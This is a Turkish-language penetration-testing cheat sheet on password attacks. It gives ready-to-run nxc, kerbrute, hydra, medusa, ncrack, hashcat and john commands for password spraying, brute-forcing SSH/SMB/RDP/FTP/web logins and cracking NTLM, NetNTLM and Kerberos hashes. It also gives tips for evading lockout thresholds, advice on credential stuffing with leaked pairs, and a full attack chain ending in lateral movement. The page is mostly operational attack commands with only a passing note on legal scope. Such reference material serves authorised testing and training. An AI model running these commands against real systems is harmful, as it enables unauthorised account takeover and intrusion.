Parola Saldırıları & Spraying
ATT&CK T1110 difficulty: kolay-orta
Parola saldırıları online (servise karşı deneme) ve offline (ele geçirilen hash’leri kırma) olarak ikiye ayrılır (T1110). Kurumsal ağlarda en etkili yöntem, tek parolanın çok kullanıcıda denendiği password spraying’dir — kilitlenme eşiğinin altında kalır.
Ön koşullar
Section titled “Ön koşullar”- Kullanıcı listesi (enum, OSINT, RID brute, SMTP VRFY)- Hedef protokol (SMB, LDAP, Kerberos, RDP, SSH, HTTP)- Lockout eşiği bilgisi (pass-pol) — yoksa çok yavaş ilerle- Offline: hash + doğru hashcat modePassword spraying
Section titled “Password spraying”nxc smb 10.10.10.5 -u user -p 'KnownPass' --pass-polrpcclient -U 'user%KnownPass' 10.10.10.5 -c "getdompwinfo"nxc smb 10.10.10.0/24 -u users.txt -p 'Sonbahar2025!' --continue-on-successnxc ldap 10.10.10.5 -u users.txt -p 'Sonbahar2025!'nxc winrm 10.10.10.0/24 -u users.txt -p 'Sonbahar2025!'kerbrute passwordspray -d hedef.local --dc 10.10.10.5 users.txt 'Sonbahar2025!'-
Kullanıcı listesi oluştur — OSINT, enum4linux, RID brute, e-posta biçimi ( ad.name , a.name , anam ), kerbrute userenum.
-
Politikayı öğren — lockout threshold, observation window, min length; eşik altında kal (ör. threshold 5 ise tur başına ≤3, 31+ dk bekle).
-
Mevsim+yıl / şirket kalıpları — Yaz2025! , Sirket2025 , Welcome1 , Password1! , lokal dil türevleri; SecLists Passwords/Common-Credentials .
-
Başarıyı doğrula ve genişlet — nxc … –shares / -x whoami ; yanal hareket ve ikinci spray turu (farklı parola).
kerbrute userenum -d hedef.local --dc 10.10.10.5 users.txtnxc smb 10.10.10.5 -u user -p pass --rid-brute 10000Online brute (tekil hedef)
Section titled “Online brute (tekil hedef)”hydra -l admin -P rockyou.txt ssh://10.10.10.5 -t 4hydra -L users.txt -P pass.txt 10.10.10.5 smbhydra -l admin -P pass.txt rdp://10.10.10.5hydra -L users.txt -P pass.txt 10.10.10.5 http-post-form \ "/login:user=^USER^&pass=^PASS^:Invalid|incorrect"medusa -h 10.10.10.5 -u admin -P pass.txt -M sshncrack -p 22 --user admin -P pass.txt 10.10.10.5hydra -l admin -P pass.txt ftp://10.10.10.5hydra -L users.txt -P pass.txt 10.10.10.5 http-get /manager/htmlCredential stuffing: sızıntı user:pass çiftlerini aynı/benzer kurumsal hesaplarda dene (kapsam ve yasal sınırlar içinde).
Offline cracking
Section titled “Offline cracking”hashid hash.txthashcat -m 1000 ntlm.txt rockyou.txt -r rules/best64.rule --usernamehashcat -m 5600 netntlmv2.txt rockyou.txthashcat -m 13100 kerberoast.txt rockyou.txt -r rules/best64.rulehashcat -m 18200 asrep.txt rockyou.txthashcat -m 2100 dcc2.txt rockyou.txtjohn --format=nt hashes.txt --wordlist=rockyou.txtjohn --format=krb5tgs kerb.txt --wordlist=rockyou.txthashcat -m 1000 ntlm.txt -a 3 '?u?l?l?l?l?d?d?d?d'hashcat -m 1000 ntlm.txt -a 1 words1.txt words2.txtcewl https://www.hedef.com -m 6 -w cewl.txthashcat --force --stdout word.txt -r rules/best64.rule | headYaygın hash mode’ları (özet)
Section titled “Yaygın hash mode’ları (özet)”1000 NTLM5500 NetNTLMv15600 NetNTLMv213100 Kerberos TGS-REP (RC4)19600 Kerberos TGS-REP (AES128)19700 Kerberos TGS-REP (AES256)18200 Kerberos AS-REP2100 DCC2 (cached domain creds)22000 WPA-PBKDF2-PMKID+EAPOLKomut üreteci
Section titled “Komut üreteci”Password Spray · NetExec
embedded toolnxc smb 10.10.10.0/24 -u users.txt -p Sonbahar2025 --continue-on-successPassword Spray · NetExec
Section titled “Password Spray · NetExec”Saldırı zinciri
Section titled “Saldırı zinciri”kerbrute userenum → users.txt → pass-pol (threshold 5) → spray Sonbahar2025! → 3 hit → SMB enum / Kerberoast → hashcat 13100 → service account → lateral